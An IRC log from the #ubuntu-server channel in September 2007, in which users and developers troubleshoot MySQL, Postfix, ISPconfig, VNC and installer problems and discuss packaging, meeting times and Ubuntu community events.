<soren> sensei: nothing else changed? Not even a network cable?
<sensei> soren: The environment is identical
<soren> craptastic
<sensei> Flushed the ARP for the entire rack after we'd established that it worked, and it picked up a new entry pretty much straight away
<ivoks> soren: what's the problem?
<soren> A machine that seemed to not respond to arp requests.
<soren> You can take a peek at the channel log about 9 hours ago.
<ivoks> oh... meeting :/
<ivoks> sorry, i forgot
<ivoks> again :/
<wolfeySI> okey one problem
<wolfeySI> i want to keep my old database
<wolfeySI> but now new ubuntu script is complaining
<wolfeySI> /usr/bin/mysqladmin: connect to server at 'localhost' failed
<wolfeySI> error: 'Access denied for user 'debian-sys-maint'@'localhost' (using password: YES)'
<wolfeySI> so to what this user must have access?
<ivoks> for upgrades of mysql
<wolfeySI> grant all on *.* ?
<wolfeySI> or what
<ivoks> soren: um... where are logs? :)
<soren> http://people.ubuntu.com/~fabbione/irclogs/
<ivoks> wolfeySI: yes
<ivoks> i need new pair of eyes :D
<wolfeySI> finally thx God and you guys
<ivoks> sensei: what ubuntu version is that?
<sensei> ivoks: 7.04 I think
<wolfeySI> can i just turn off this debian mysql startup thin
<ivoks> very strange
<ivoks> sensei: if router doesn't have arp for those computers, then it's router's fault
<ivoks> router should return who-has answer to client
<ivoks> it would be great if you could debug router
<wolfeySI> i guess you could on some
<wolfeySI> i have Linksys WRT54GL... since i can install non-cisco firmware, you could
<wolfeySI> power of linux
<wolfeySI> thx guys.. new server works so much better than old
<wolfeySI> and all data and most of config safely copied
<wolfeySI> :)
<mralphabet> wolfeySI: You seem to have things working again, what was the change that made it work for you?  You seem to have went from Start: FAIL to asking about db's so I am just curious . . .
<wolfeySI> before poor pentium 3 600 mhz tried to work.. now xeon 2.4
<wolfeySI> mralphabet: mm my old my.cnf and new ubuntu mysql my.cnf had mysql.sock in different directories
<wolfeySI> so mysql start failed
<wolfeySI> that was most of the problem
<wolfeySI> took me a while
<wolfeySI> so it said mysql.sock does not exist, but i cant bind to port 3306
<wolfeySI> that told me in /var/log/daemon.log
<lafuma> hey, does anyone use ISPconfig ?
<wolfeySI> i tried to install it... realized it's pointless
<lafuma> why is that ?
<lafuma> easier to do everything just manually ?
<wolfeySI> well main reason was, that compile failed
<wolfeySI> now i know i should do apt-get install build-essential
<wolfeySI> but then i didnt
<lafuma> okay
<wolfeySI> lafuma: now i come here crying to help cause my perfect config from old ubuntu didnt work on new
<wolfeySI> :)
<wolfeySI> and these guys think i should use new configs:)
<lafuma> hehee
<wolfeySI> but that means work that i did a year ago
<wolfeySI> :)
<lafuma> just go with the old one ;)
<wolfeySI> yes;)
<lafuma> less headache
<wolfeySI> oh well...
<wolfeySI> there was some:)
<wolfeySI> apache2.2 seems to be a bit different than 2.0
<lafuma> what are you running ?
<lafuma> on your server
<wolfeySI> apache, mysql, postfix, courier
<lafuma> nice
<lafuma> maybe you can somewhat help me
<lafuma> i have to set up damn 30-40 mail accounts on postfix
<lafuma> on 5 different domains
<lafuma> never touched that thing
<wolfeySI> well i did it mostly according to http://flurdy.com/docs/postfix/
<wolfeySI> i skipped some antispam things i dont think are worth my pain
<wolfeySI> this tutorial does with mysql user database and 'virtual' mail boxes
<wolfeySI> and imap
<lafuma> yeah, nowadays mail clients have spam filters built in ;)
<lafuma> nice
<lafuma> thats exactly what i need
<wolfeySI> dunno how updated it is
<ivoks> wolfeySI: that's not what we said
<wolfeySI> but... it worked for me (with some trial and error)
<ivoks> i've said you shouldn't touch my.cnf
<wolfeySI> ivoks: you said i'm impolite to you
<wolfeySI> :)
<lafuma> 2006 end
<ivoks> and put your config in conf.d/
<ivoks> files in conf.d overwrite configs set by my.cnf
<wolfeySI> ivoks: i'll do that in a year when disk dies
<wolfeySI> :
<wolfeySI> :)
<ivoks> just don't come here again when upgrade of mysql overwrites default my.cnf
<ivoks> :)
<wolfeySI> ivoks: but is it just my impression
<wolfeySI> or gentoo is actually easier to configure than ubuntu?
<wolfeySI> cause gentoo doesnt try to be smart in debian-way
<ivoks> i'ts hard when you force logicA on logicB
<ivoks> that's why there are so many windowse users, while linux is much better
<wolfeySI> it seems problem with binary distributions... if you dont do it their way, they are angry
<ivoks> if you understand debian logic, you will find benefits of it
<wolfeySI> that's why i left fedora world forever and switched to gentoo for my home pc
<ivoks> tell me, what happens when you upgrade mysql on gentoo?
<ivoks> and there are some changes in my.cnf
<ivoks> you get two files
<wolfeySI> it asks me what to do
<ivoks> and you should manually pick new things from new my,cnf
<ivoks> on ubuntu, if you put you my.cnf in conf.d, no one asks you anything, and everything works
<wolfeySI> oh now i remember where i was mosty angry at ubuntu
<wolfeySI> ubuntu by default blocks cups web interface, cause i should do it from gnome?!
<wolfeySI> i had to find out to which group user must be added
<wolfeySI> so i could use web interface
<ivoks> that's not true?
<wolfeySI> it is
<wolfeySI> at least for admin part
<ivoks> i'm in ubuntu printing team :)
<wolfeySI> by default you cant log in as cups admin
<ScottK> wolfeySI: That's probably just a side effect of Ubuntu changing CUPS to not run as Root.  That IMO was a very good decision from a security perspective.
<ivoks> as on any distribution, users in lpadmin group have all the rights
<wolfeySI> ivoks: root doesnt
<wolfeySI> that troubled me
<wolfeySI> oh and one another
<wolfeySI> if i'm in Xwin... and i in console 'su root'
<ivoks> root also
<wolfeySI> root cant use my desktop for programs
<wolfeySI> some security thing
<wolfeySI> so i cant do sudo kate
<wolfeySI> i must do kde-su kate
<ivoks> that's on all distros :D
<lafuma> is there something similar to ISPconfig, that can handle my apache and postfix ?
<lafuma> over web
<ivoks> what's wrong with ispconfig?
<lafuma> i'm just too damn dumb to use it
<lafuma> i couldnt get email accounts working
<ivoks> :)
<wolfeySI> ivoks: nope
<lafuma> also it indicated me that none of the services worked "offline" although they were running
<wolfeySI> in gentoo i can be in Xorg as user and when i run something as root, it appears on Xorg
<wolfeySI> because i have no security manager for Xorg?! ;)
<lafuma> i would gladly use it, if you have time to answer to some of my questions
<ivoks> wolfeySI: then gentoo has security problems
<ScottK> lafuma: For getting Postfix and Email working, my recommendation is to buy a copy of "The Book of Postfix" and work from that.
<wolfeySI> ivoks: well gentoo is not automatic... you do what you want
<ivoks> lafuma: ispconfig on ubuntu is 5 minutes work
<ivoks> lafuma: i have it and it works great... i even have uptime of 200 days with it
<lafuma> heh
<lafuma> i got it working
<lafuma> ofcourse
<lafuma> but it has some errors
<lafuma> and i have no clue why
<lafuma> brb
<wolfeySI> ivoks: one stupid question
<wolfeySI> do you know how to add a custom service at boot? let's say more user level, after most is loaded
<wolfeySI> i remember having it in /etc/rc2.d
<wolfeySI> as S99MyService
<wolfeySI> is that ok?
<ivoks> you should create init script in /etc/init.d/
<ivoks> and then use update-rc.d
<ivoks> or you can do it like you did
<wolfeySI> yeh but there was some command
<wolfeySI> to add it
<ivoks> to add it where?
<ivoks> runlevel?
<wolfeySI> to init scripts
<wolfeySI> yes
<ivoks> as i said, create a script in /etc/init.d/mambojambo
<ivoks> update-rc.d mambojambo defaults
<wolfeySI> but then i must do some scripting for start restart stop
<ivoks> well, of course
<wolfeySI> i want it simple
<wolfeySI> just that it loads
<wolfeySI> rc.local would do too
<ivoks> or rc.local, yes
<wolfeySI> i have some lovely java programs written for us
<wolfeySI> so boss can add product images for web shop from java.. click... it is sent to server and thumbnails are created by imagemagick
<wolfeySI> i'm more java expert than linux admin
<wolfeySI> but.. what can i do
<wolfeySI> :)
<ivoks> you should buy support for linux then :D
<ivoks> and since you live very near me, i would be happy to sell it some support contracts :D
<lafuma> ivoks: do you know what might be the reason that ispconfig shows most of the services "offline"
<lafuma> only mysql seems to be online
<lafuma> according to ispconfig
<ivoks> what version of ubuntu do you have?
<lafuma> 7.04
<lafuma> i followed some tutorial
<lafuma> sec, i'll find a link
<ivoks> there's a great howto on howtoforge.org
<lafuma> http://www.howtoforge.com/perfect_setup_ubuntu704
<lafuma> this one
<lafuma> did everything exactly step-by-step
<lafuma> no errors on the way
<ivoks> which version of ispconfig?
<lafuma> the newest
<ivoks> and it shows apache as offline?
<lafuma> yes
<ivoks> but apache is working?
<lafuma> yes
<lafuma> otherwise i couldnt see ispconfig ;)
<ivoks> um... no
<ivoks> ispconfig uses its own apache
<lafuma> oh
<lafuma> damn
<ivoks> which listens on :81
<ivoks> distribution's apache is something else
<ivoks> you will host web sites with apache from distribution
<lafuma> okay
<ivoks> apache in ispconfig is only for administration of ispconfig, webmail, and stuff like that
<lafuma> got it
<lafuma> that doesnt fix my problem tho
<ivoks> i guess you didn't follow that howto :)
<ivoks> i bet you skiped this part:
<lafuma> the mail setting part in ispconfig ?
<ivoks> We need a DNS and LAMP server, but nevertheless I don't select any of them now because I like to have full control over what gets installed on my system. We will install the needed packages manually later on
<lafuma> nah m8
<lafuma> i didnt skip it ;)
<ivoks> so, you have apache2 installed?
<lafuma> i do
<ivoks> then start it
<lafuma> its working
<ivoks> and still offline in ispconfig?
<lafuma> yes
<ivoks> interesting...
<lafuma> indeed
<ivoks> you should ask people in #ispconfig
<lafuma> hehe
<ivoks> some intenal checking in ispconfig doesn't work
<lafuma> there isnt anyone in that channel
<ivoks> heh
<lafuma> i checked it before joining this channel ;)
<ivoks> uff... ispconfig's code is complicated :/
<ivoks> so, when you go to http://localhost, it shows ispconfig default page?
<lafuma> ivoks: exactly
<ivoks> ask at ispconfig's mailing list
<ivoks> i can't debug it now, cause i have to go
<lafuma> ok
<lafuma> thanks for your help
<ivoks> np
<wolfeySI> Morning wolfey
<wolfeySI> You will see your penis on MTV
<wolfeySI> heung puklek
<wolfeySI> http://kristd.com/
<wolfeySI> i love spam:)
<gamble6x> lol
<wolfeySI> i talked to schoolmate at university about this spam about penis enlargment
<wolfeySI> he said, it aint too bad, they recommend me to enlarge boobs as well
<wolfeySI> enjoy folks and thanx a lot for help
<ScottK> Three cheers for soren.
<mathiaz> How could I test if the print server task is installed successfully ?
<mathiaz> (I'm adding a testcase for the print server task)
<ScottK> soren: Now that you're a core-dev, would you be up for helping me with some source backports?
<heno> mathiaz: looks good, will you add mailserver as well? I don't think we'll add those categories to the tracker until after beta
<mathiaz> heno: I'm in the process of doing so.
<heno> great
<mathiaz> heno: I've just installed all the tasks and need to figure out what can be tested.
<heno> ok
<ajmitch> soren: good work on core-dev
<nealmcb> soren: congrats
<ajmitch> nealmcb: thanks for raising the point about meeting times :)
<nealmcb> ajmitch: np  I'm all for getting more folks involved
<nealmcb> ajmitch: you should suggest a time to get the ball rolling
<ajmitch> 3AM just hasn't been a convenient time
<mathiaz> ajmitch: dendrobates suggested moving the meeting earlier. I thought about later instead. What would you prefer ?
<ajmitch> earlier is easier, but it depends on how much later or earlier
<ajmitch> would +- 12 hours work?
<nealmcb> I was thinking we could leave one meeting as is, and have another (alternate weeks) at a different time, e.g. 12 hours off
<ajmitch> nealmcb: we try & do that for MOTU
<nealmcb> what times do you use?
<mathiaz> well if we do +12, europeans won'T make it.
<ajmitch> 12:00UTC
<ajmitch> so we vary between 0 & 12 UTC on a friday
* jdstrand is getting dinner
<ajmitch> there's not much point having a meeting if there's only going to be a couple of people there who aren't usually involved
* nealmcb . o O (the sun never sets on Ubuntu)
* ajmitch isn't generally involved with the server team
<lafuma> what might be the problem if postfix recives the emails just fine, but doesnt send
<ScottK> lafuma: Pastebin the relevant log entries and we can have a look.
#ubuntu-server 2007-09-26
<sommer> dendrobates: are you about?
<wasabi> Is anybody supporting iscsi targets?
<soren> ajmitch: Thanks!
<ajmitch> soren: now you'll be able to get bugfixes uploaded much faster :)
<soren> ajmitch: Yeah. This is going to make my day much easier.
<ajmitch> I see that I didn't fix samba properly
<soren> ajmitch: Oh? I haven't really paid much attention to bug mail for about a week. I've been a bit tied up.
<ScottK> Thanks to the recent 'improvements' in LP there are a lot fewer open now.
<soren> \o/ :)
<ScottK> I'll leave it at that.  Too much thinking about LP right before I go to bed is not helpful for getting to sleep.
<Kamping_Kaiser> heh
<ncopa> hi
<soren> 'morning.
<ncopa> im looking at the kernel config for ubuntu server
<ncopa> noticed that NAPI is turned off on NIC drivers
<ncopa> does anyone know why its disabled?
<ncopa> http://en.wikipedia.org/wiki/New_API
<soren> ncopa: I see it's enabled for a few drivers.
<soren> ncopa: Which nic do you have?
<soren> ...and which version of Ubuntu are we talking about?
<ncopa> well... its a general question
<ncopa> im building a distro myslef
<ncopa> and its supposed to support as many nic as possible
<soren> I don't know why it's enabled for some and disabled for others. You should try in #ubuntu-kernel, but most of the kernel team is in the US, so they're probably asleep.
<ncopa> ok, thanks alot
<soren> np
<kraut> moin
<ivoks> soren: congratz! :D
<soren> ivoks: \o/
<soren> Thanks!
<ivoks> hehe
<ivoks> now i'll nag you about patches for main :D
<soren> :)
<freeflying> soren: congrats!
<soren> freeflying: thanks! :)
* ajmitch can nag soren now :)
<soren> ajmitch: Yeah, and then I can tell you to go fix it yourself :)
<ajmitch> haha
<tepsipakki> quick question; is the FDS autotoolized yet?
<tepsipakki> fedora directory server, that is
<TeTeT> soren: congrats to your core dev status!
<soren> TeTeT: Thanks very much!
<ajmitch> tepsipakki: 1.1 branch is, with no set release date
<tepsipakki> ajmitch: thanks..
* ajmitch should probably just get his fds packages working & shove them into a ppa
<soren> ajmitch: That would ROCK!
<tepsipakki> it would
<ajmitch> once they work
<soren> bah
<ajmitch> I'm trying to rebuild it now, and having some small issues :)
<tepsipakki> btw, what is the DL for UDS specs?
<soren> dl?
<ajmitch> deadline
<tepsipakki> deadline
<soren> ah
<ajmitch> the 2nd last day of UDS, probably :)
<tepsipakki> hehe :)
<ajmitch> since they scheduled stuff daily
<tepsipakki> ajmitch: I'll finally make it there :)
* ajmitch won't
<tepsipakki> oh crap :/
<ajmitch> I wasn't expecting to go
<ajmitch> nor would I be much use there
* ajmitch only looks after a few servers
<soren> Heh. I hardly even do that anymore :)
<ajmitch> that's because you're special
<soren> <g>
<ajmitch> ok, compile errors, I'll care about it later
* ajmitch sleep now
<ScottK> soren: I saw you mention vmware-server earlier.  I
<ScottK> I've run into a vmware-player issue and I'm not sure what to do.
<soren> ScottK: Yes?
<ScottK> Up for a discussion on it?
<soren> Sure.
<ScottK> The vmware-player we have is old, unmaintained and has no kernel modules for Gutsy (as I understand it).
<ScottK> In Debian there is vmware-package which also provides a vmware-player binary, but we don't have that at all.
<ScottK> Our vmware-player also happens to be the last openssl 0.9.7 rdepend in the archive.
<ScottK> So the questions are:
<ScottK> 1. Is vmware-player as we have it worth having in the archive at all?
<ScottK> 2.  Would it be significantly better to have vmware-package?
<ScottK> 3.  Is it worth inflicting pain on the archive admins to try and get vmware-package into Gutsy?
<soren> I now very little about -player. It does look somewhat outdated, though.
<soren> "I *know* very little"...
<ScottK> 4.  Or do we just remove vmware-player and not care?
<ScottK> soren: That's more than me.
<soren> I'm not sure how vmware is involved in this. If you look at the changelog, they did at least some of the packaging.
<ScottK> All I know about it is if we can replace it, we can avoid shipping openssl 0.9.7 in Gutsy and that'd be good.
<soren> I'm not sure if they intend to update it at some point.
<ScottK> Well here's the other - http://packages.qa.debian.org/v/vmware-package.html
<ScottK> It looks much more maintained.
<soren> Ah, it's like java-package. It doesn't actually contain the stuff, but helps package it.
<ScottK> Yes.
<ScottK> soren: Any suggestions on who we could take this to?
<soren> I'll have to talk to mdy about it. I think he knows about the vmware packages.
<soren> He's not around right now, though.
<ScottK> soren: Thanks for following up on it.  It'd be really cool to dump openssl 0.9.7 if we can do it reasonably.
<soren> Yeah.
<Kamping_Kaiser> theres a canonical server team?
<soren> Yes.
<soren> https://edge.launchpad.net/~canonical-server
* Kamping_Kaiser wonders what they do
<soren> Work.
<zul> Kamping_Kaiser: i dont know something to do with servers ;)
* Kamping_Kaiser decides to avoid being snide and goes to bed
<Kamping_Kaiser> zul, certainly hope so ;)
<soren> Kamping_Kaiser: Is there anything in particular you're curious about?
<soren> Kamping_Kaiser: (If it's not obvious from the context, I'm on that team)
<Kamping_Kaiser> soren, a bug i reported got asigned to it, i was wondering what that meant as far as the bug getting fixed meant. the teams page on LP is useless as far as explaing the group
<ScottK> I thought the description made it very clear what the team was for.
<Kamping_Kaiser> unless i'm looking in the wrong place...
<soren> The LP team was created with the specific purpose of having a team to which private, server related bugs could be assigned.
<ScottK> Which is what LP says about it.
<TeTeT> what's my best choice in profiling a slow app? oprofile, valgrind, anything else?
<soren> Depends.
<soren> TeTeT: What is it?
<TeTeT> soren: an accounting application, GUI driven, kind of a weird text based interface
<soren> What's it programmed in?
<TeTeT> soren: I don't know, it's a binary. I suspect C or C++
<soren> TeTeT: That makes it sort of difficult. What do you hope to achieve?
<TeTeT> soren: to come up with an explanation why every single menu item takes 2-3 seconds to react
<soren> TeTeT: You could try stracing it. Otherwise, I'm clueless. If it's binary, there's not much information to be collected.
<TeTeT> soren: agreed
<TeTeT> soren: it's not stripped, so the function names might be present
<soren> TeTeT: I'm not sure, really.
<zeasier> does ubuntu server have an mail transfer agent installed by default?
<_ruben> a lamp install might, a minimal install doesnt as far as i recall
<_ruben> minimal doesnt even have sshd installed for instance
<zeasier> that's true
<zeasier> so i guess i have to choose one then
<_ruben> which is a good thing imo
<zeasier> yeah
<lamont> basic security policy is that if it listens on a network port, then you have to install it.
<_ruben> i'd say its better to pick one yourself starting with nothing, else you'd hafta uninstall first
<lamont> OTOH, LAMP is a "install this for me" target, so it gets to sidestep that policy a bit
<_ruben> hmm .. that's a very nice policy imo
<_ruben> must admit that i havent played much with ubuntu (server), yet
<zeasier> makes sense to me
<zeasier> it's pretty handy if you use bzr for revision control
<_ruben> bzr?
<zeasier> other distros are understandably behind on bzr packaging
<zeasier> <a href="http://bazaar-vcs.org/">Welcome - Bazaar Version Control</a>
<_ruben> looks nice at first sight
<ScottK> zeasier: Postfix is the preferred/most supported MTA.
<zeasier> yeah, i've experience using it
<zeasier> just not as a "null client"
<zeasier> which is aparently what i'm trying to do
<zeasier> though now that i've found some documentation on how to setup a system that way, i'll be sticking with postfix
<ScottK> lamont: Should Bug #145263 be against GNU TLS?  Is this the LDAP linking issue again?
<ubotu> Launchpad bug 145263 in postfix "segfault in gssapi.c:671" [Undecided,New]  https://launchpad.net/bugs/145263
<lamont> ScottK: not postfix's bug, that's for sure...
<lamont> sasl calls ldap which dies.
<ScottK> Agreed.  Just trying to shove it in the right direction.
<lamont> so could be the linking thing, could be other braindamage in one or both
<lamont> and if both libs are involved, then linking for the win
<ScottK> It looks like it dies in LDAP. so I'll blame that one.
<ScottK> Even if SASL feeds it garbage, it shouldn't die.
<lamont> right
<ScottK> lamont: Finger pointed at openldap2.
<jcastro> keescook: soren: Who wants to run a -server session for ubuntu open week?
<keescook> jcastro: hm, soren might be a better choice -- I'm usually neck-deep in security work.  If no one else volunteers, I can do it, though.  :)
<ScottK> keescook: Very smooth redirect.
<keescook> heh
<jcastro> heh
<keescook> ScottK: too easy, too.  soren's probably asleep atm.  :)
<ScottK> As an added bonus, it's even true.
* ajmitch wouldn't be able to do anything for ubuntu openweek again
<ajmitch> jcastro: you get the job of organising it now? :)
<jcastro> ajmitch: heh, the schedule at least.
<jcastro> ajmitch: I'll put you down for 4 or 5 sessions
<ajmitch> if you do, make sure they're not at 4am NZ time
<ajmitch> I'm not too coherent around then
* ajmitch might be able to do 1 or 2
<nealmcb> jcastro: when is it?  this seems old:  https://wiki.ubuntu.com/UbuntuOpenWeek
<jcastro> week of october 22nd.
<jcastro> nealmcb: the page will be updated real soon now.
<nealmcb> jcastro: is that a regular thing the week after a release or something?
<ajmitch> I think this'll be the 3rd, maybe 4th one now?
<ajmitch> first one was late november last year, then april, so this is the 3rd
#ubuntu-server 2007-09-27
<tarelerulz> This might be the wrong place to ask ,but I am lost and someone told me to come here.  I ssh into my remote computer and run vncserver and then I open a tap on the terminal for my local computer  Then I put vncviewer  ipaddress-desktop:1 .   The computer is at gdm screen I think.
<tarelerulz> vnc will not let me on
<leonel> according to the times    PostgreSQL  8.3  will be released in this year    any  chances it got included  in Hardy ?
<kgoetz> when this year?
<leonel> kgoetz: at years end  maybe
<leonel> so if it gets released  good chances are that gets included  right ?
<kgoetz> leonel: good chance it would make it into universe, not sure about main
<leonel> "we" need it in main  :-P
<leonel> I mean  if it will be a LTS  having a 8.2 version for 5 years  when the 8.3 is out I think it's not too good
<kgoetz> being LTS unless its well tested it wont make main
* kgoetz doesnt know how different 8.2 and 8.3 will be (eg how much testing is needed)
<leonel> well  let's  test it :0
<leonel> :)
<kgoetz> lol :)
<tarelerulz> when I run vnc on  the computer I want to vnc into I get this "xauth:  /home/tarelerulz/.Xauthority not writable, changes will be ignored
<tarelerulz> xauth:  error in locking authority file /home/tarelerulz/.Xauthority"
<tarelerulz> I just lost . If this is not the right place I understand .  Just not getting any help in #ubuntu .
<kgoetz> tarelerulz: can you write to the home directry?
<tarelerulz> local or in the remote computer ?
<kgoetz> both
<tarelerulz> I ssh into the remote one and I can write to home directory on it and I can write to the home directory on the local one to.
<kgoetz> whats `ls -lh /home/tarelerulz/.Xauthority` output?
<tarelerulz> for the remote one it is "-rw------- 1 root root 929 2007-09-25 04:20 /home/tarelerulz/.Xauthority and the local one -rw------- 1 root root 251 2007-09-14 19:50 /home/tarelerulz/.Xauthority
<kgoetz> are you trying to connect s root?
<kgoetz> those files should be owned by the user in question, not root
<tarelerulz> I am not trying to log  on them as root
<tarelerulz> all I did on the remote one is install  vnserver and then I ran it .  I have have use sudo at the time.  When I went to back to the computer I just put vncserver in
<tarelerulz> one the remote computer I installed vncserer one
<tarelerulz> It said username-desktop:1
<tarelerulz> When I try to  do vncviewer from my other computer it would not let me on
<tarelerulz> With the ipadress:1 of the remote computer
<kgoetz> those .Xauthority files have the wrong owner, you wont be able to log in while thats the case
<tarelerulz> So how would I change the owner of thoese files ?
<ajmitch> leonel: given that hardy will have an upstream version freeze around mid-feb, there's a good chance it'll get in
<kgoetz> ssh into the system and type `sudo chown <correct owners name> .Xauthority`
<tarelerulz> WEll, I need to turn off the vncserver to  do  that. So it is not use the file or something
<tarelerulz> Just asking , I don't know and I wanted to make sure I understand everything. OH by the way thanks alot for your help
<leonel> ajmitch: great !
<kgoetz> tarelerulz: i dont know if you have to turn off vnc server, i havent used it.
<tarelerulz> when I ssh into the remote computer  I just type vncview in and it runs it .
<tarelerulz> Is that the right way. I think it runs it as my normal user .
<tarelerulz> I did sudo vncserver one time so that maybe the reason the files are owned by root.
<kgoetz> as i say - i havent used it beoer
<tarelerulz> haha this is all so fun.  I like have some idea what is going on.  Thanks for your help
<kgoetz> np
<tarelerulz> When I do get this working  my networking dreams will be realized .  I must say I love Ubuntu/Linux .
<kgoetz> anyone running slapd on gutsy?
<kgoetz> i'm wondering if your seeing a  /etc/ldap/slapd.conf: line 43: unknown directive <checkpoint> inside backend database definition (ignored).
<kgoetz> in syslog. i'm pretty sure that optiosn there by default.. wondering if its  a bug
<ScottK> soren: DId you get anywhere with looking into vmware-player?
<soren> ScottK: No, Malcomlm didn't show up yesterday before I left.
<ajmitch> evening
<_ruben> gug
<soren> gug?
<_ruben> generic utc greeting
<_ruben> saying 'evening' at 10:47am is a bit odd ;-)
* serishema smirks
<emretemp_> 12:42 pm here ; )
<_ruben> the joys of inter-timezone-communications :)
<ScottK> soren: OK.
<Kamping_Kaiser> _ruben, when someoen enteres the channel, its morning, when they leave its evening. there is no other rule :)
<soren> ScottK: Huh?
<soren> Kamping_Kaiser: Leave the channel? wtf?
<Kamping_Kaiser> soren,  /part /quit etc
<mralphabet> o0
<soren> Kamping_Kaiser: Who does that?
<ScottK> soren: Just saw your reply about vmware
<soren> ScottK: Oh.
* Kamping_Kaiser observes comment painfully hit wall over folks head
* soren loses track of the ~100 conversations he's got going on at any given time.
<_ruben> Kamping_Kaiser: that's an 'odd' rule i'd say ;)
<Kamping_Kaiser> hehe
<nealmcb> I'm up for ubuntu membership in the Community Council meeting in 2 hours.  Mostly based on my loco work, but if anyone would like to vouch for my participation in the server team, that would be appreciated :-)   https://wiki.ubuntu.com/NealMcBurnett
<jcastro> soren: Do you feel comfortable doing a -server session for ubuntu open week?
<soren> jcastro: I'm not entirely sure what a "yes" to that question would actually entail.
<nealmcb> https://wiki.ubuntu.com/CommunityCouncilAgenda
<soren> nealmcb: I'll be there cheering you on!
<dantalizing> nealmcb, unfortunately, i dont think wannabes have any clout
<dantalizing> that didnt come out right....i 'll be there, but not sure i'll add value
<jcastro> soren: basically you answer a bunch of questions from users.
<jcastro> soren: it doesn't matter to me who it actually is, as long as it's someone from the server team.
<soren> jcastro: Ah, no, talk beforehand? Then it's fine. Sign me up.
<jcastro> soren: kees volunteered you when you were sleeping. :D
<jcastro> soren: https://wiki.ubuntu.com/UbuntuOpenWeek/Prep
<jcastro> pick a time
<soren> jcastro: How nice of him :)
<jcastro> beginning of the week would be best, we're trying to spread them out.
<soren> Um... Do you think ogra has considered that he should be en route to Boston at that time?
<soren> Ah, no, he should be there already at that time. NEver mind.
<soren> Heh... All of the available slots are outside my working hours :) Let's go with Monday 1600-1700 UTC.
<nealmcb> dantalizing: My sense is that clout is important for some things, but not for confirming that I've been known to offer supoprt on #ubuntu-server and show up at meetings and actually follow thru on an action item or two :-)
<soren> nealmcb: Could you give me a ping here or something when you're up?
<nealmcb> ping
<soren> "up" as in "when it's your turn in the meeting" :)
<soren> Not as in "awake".
<nealmcb> soren: ahh - I'd be delighted to :-)
<soren> ...or have I just ruined a joke?
<soren> Ok :)
* nealmcb lol
<_ruben> hehe
<nealmcb> soren: I'm #3 on the list and they are starting with locos and members this time, so it will be earlier than usual
<soren> It's in an hour and 20 minutes or thereabouts, right?
<dantalizing> soren: yes
<soren> Mkay
<tonyyarusso> hey folks, just reading Beta release e-mail, and saw "Pre-configured installation options: Mail Server, Print Server, Database
<tonyyarusso> Server, and File Server options join existing LAMP and DNS options
<tonyyarusso> Wanted to give you all a high-five, as that was something on my personal wishlist, so great job!
<_ruben> hmm ..
* _ruben goes back to reading the release mail .. smth came up while reading it
<soren> tonyyarusso: :)
<_ruben> what would be the next lts version? or isnt that known yet?
<lamont> _ruben: hardy(?).  gutsy+1 in any case
* lamont needs to remember that name
<_ruben> ah ok, so that'd be 6-7 months from now, right?
<mathiaz> _ruben: april 2008
<mathiaz> I've written an email I plan to send to ubuntu-serverml to ask for beta testing of ubuntu server. It's located at https://wiki.ubuntu.com/ServerTeam/GutsyBetaAnnouncement.
<_ruben> i should check our novel suse subscription details .. im not that happy (anymore) with sles9 and/or sles10 .. considering alternatives
<mathiaz> If anyone wants to have a look and comment on it, it would be great !
<_ruben> "It doesn't take some much time..." ? ;-)
<mralphabet> mathiaz: "and this an easy and simple way"
<mathiaz> mralphabet: this *is* an easy - corrected. Thanks.
<mralphabet> mathiaz: _ruben's comment above is for you as well
<mralphabet> 09:19 < _ruben> "It doesn't take some much time..."
<mathiaz> mralphabet: yeah - corrected.
<mathiaz> _ruben: thanks.
<_ruben> np
<_ruben> i wish we had a proper test environment here .. i'd love to try out ubunutu-server as an alternative for our suse boxes
<mathiaz> _ruben: you could use vmware to do your test.
<_ruben> i did a single ubuntu server install under ubuntu already (dont recall if it was feisty or the last lts version) to see what was in it (version-wise and all)
<_ruben> the fact that ubuntu has a faster release cycle than novel/suse is both a pro and con for us (and for many others i think)
<_ruben> we actually went from debian (after having abandoned slackware) to suse due to debian's insanely slow release cycle
<nealmcb> mathiaz: I'd suggest asking for testing of the tasksel stuff also
<_ruben> we needed 2.6 kernel and sarge was getting delayed over and over
<nealmcb> the release announcement talks of "Mail Server, Print Server, Database Server, and File Server" - but shouldn't that be Samba Server or something?
<mathiaz> nealmcb: Thanks - updated.
<mathiaz> nealmcb: technically yes.
* nealmcb also needs to check on "database server" - is that mysql?  postgresql?
<mathiaz> nealmcb: well the task is named Postgresql Database server
<mathiaz> nealmcb: mysql server is installed with the LAMP tasks.
<nealmcb> I think using the actual task names is good in documentation, release notes, etc
<nealmcb> ahh - so lamp with postgres means uninstall mysql?
<mathiaz> nealmcb: no. mysql and postgresql can coexist.
<nealmcb> sure, but it is often good to remove unused packages
<mathiaz> nealmcb: sure. But this is not what tasksel should be used for.
<nealmcb> ala the discussion of samba+nfs vs one or the other
<keescook> soren: well, by volunteer, I suggested you'd know more than me about the subject.  :)
<soren> keescook: Where "the subject" is "whatever people ask", apparantly :)
<keescook> soren: heh.  you want to do it as a team?
<soren> keescook: No, no, it's fine.
<nealmcb> soren, et al., Looks like I'll be next, after peanutb who just started.  https://wiki.ubuntu.com/CommunityCouncilAgenda
<soren> nealmcb: I'm there, dude.
<nealmcb> I'm up
<nealmcb> soren ^
<soren> I see it.
<frojnd> hello tere
<frojnd> there*
<frojnd> I've came to a part where do I have to set partitions
<frojnd> so I have:
<frojnd> configure software raid, configure LVM guided partitioning, help on partitioning and undo and finish...
<frojnd> but
<frojnd> when I click on a configure software raid
<frojnd> nothing happens
<frojnd> just ask: keep current partition layout and configure raid
<frojnd> and than I click yes
<frojnd> and there is just a big blue screen
<frojnd> and I can write there...
<frojnd> I don't think this is right..
<soren> You need to create a partition for raid first.
<soren> Create a partition, and make set it to "use as: software raid volume" or something.
<bddebian> Hey folks.  Any apache2 gurus here?
<mathiaz> bddebian: you should just ask your question...
<bddebian> Gah.  I'm looking through several of the libapache-xxx-xxx packages to see if they are still needed.  Right now I'm looking at libapache-asp-perl which depends libapache-filter-perl and libapache-ssi-perl.  I don't think the filter depends is necessary anymore and from what I'm reading apache2 includes mod_include.  Just trying to verify that.
<sommer> hey all, I have a Sun Blade 100 and I was wondering if that old of a machine will work to test the Sparc ISOs?
<sommer> I did get the ISO from the other day to install fine.
<frojnd> hm
<frojnd> that's interesting
<frojnd> I've just installed ubuntu server
<frojnd> and now I wanna install xfce
<frojnd> but there isn't any xfce package
<frojnd> do I have to load it first?
<frojnd> from web?
<ivoks> yes
<ivoks> it's not on CD
<mathiaz> frojnd: you can try to install xubuntu-desktop from the web
